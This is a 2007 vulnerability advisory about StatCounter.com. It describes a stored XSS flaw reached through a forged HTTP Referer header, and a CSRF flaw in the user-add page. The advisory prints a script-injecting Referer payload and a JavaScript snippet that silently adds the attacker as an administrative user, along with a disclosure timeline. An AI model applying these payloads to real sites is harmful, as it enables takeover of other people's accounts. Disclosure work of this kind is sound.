1. DESCRIPTION OF THE SOFTWARE

StatCounter.com is a free yet reliable invisible web tracker, highly
configurable hit counter as well as a real-time detailed web stats tool.
Insert a simple piece of our code on your web page or blog and you will
be able to analyse and monitor all the visitors to your website in
real-time! [from statcounter.com]

2. DESCRIPTION OF THE VULNERABILITY

The referrer field is taken from the HTTP header generated by the user
with his browser. So it's a user-input and it is therefore possibile to
tamper with it.
This is a snip of the code taken from the section "Came From" of the
statistics page on statcounter.com

...
<img src="http://www.statcounter.com/images/drill_down.gif" alt="drill
down" border="0"></a></td><td class="tableContent1Right">1</td><td
class="tableContent1Left"><a
href="http://www.google.it/?q=stat+counter"
target="_blank">www.google.it/?q=stat+counter</a></td></tr>
...

If an attacker creates an HTTP request with this header, an alert box
will be displayed when the blogger reads his stats:

Referer:http://www.domain.it"></a><script>alert("XSS")</script><a href="

On the stats page this HTML code will be written:

...
<img src="http://www.statcounter.com/images/drill_down.gif" alt="drill
down" border="0"></a></td><td class="tableContent1Right">1</td><td
class="tableContent1Left"><a
href="http://www.domain.it"></a><script>alert("XSS")</script><a href=""
target="_blank">http://www.domain.it"></a><script>alert("XSS")</script><a
href="</a></td></tr>
...

3. ANALYSIS

An attacker could forge the HTTP Referrer so to inject inside it some
Javascript code aiming to create a persistent Cross-Site Scripting (XSS).

In order to exploit this vulnerability, an attacker can simply request a
page controlled by the StatCounter script and send a specially crafted
HTTP header.

Besides the XSS bug, there is also another one: in the "user" page on
the personal account area it is possbile to add a new user to the
statistics page. The page that receives the parameters (/user/add.php)
does not use any validation code for preventing CSRF (Cross-Site Request
Forgery).

So, in this case, is it possible to create a CSRF with a simple piece of
JS code injected into the referer HTTP header like this:

<SCRIPT>
var img = new Image();
img.src =
'http://'+document.domain+'/users/add.php?postback=1&username=MyUserName&etc...';
//this is not all parameters needed
</SCRIPT>

Note that the original form method is POST but the PHP page retrieves
the parameter with a $_REQUEST method and the"document.domain" is
necessary because Stat Counter uses a different Web server for load
balancing.

In this way an attacker can, silently, add himself/herself, with
administrative privileges, to statistics panel of a compromised account
and he/she can execute some JavaScript code.
No user interaction is needed.

4. IMPACT

The impact of this vulnerability is HIGH for integrity of Stat Counter
customer account.

5. TIME LINE

05/07/2007 - Vendor contacted
16/07/2007 - Vendor solved XSS bug
17/07/2007 - Vendor working on CSRF bug
23/07/2007 - PUBLIC DISCLOSURE

-- 
Matteo Carli
matteo@matteocarli.com  |  web: www.matteocarli.com
GPG keyID: 0xD20BA70A  |  GnuPG key server: pgp.mit.edu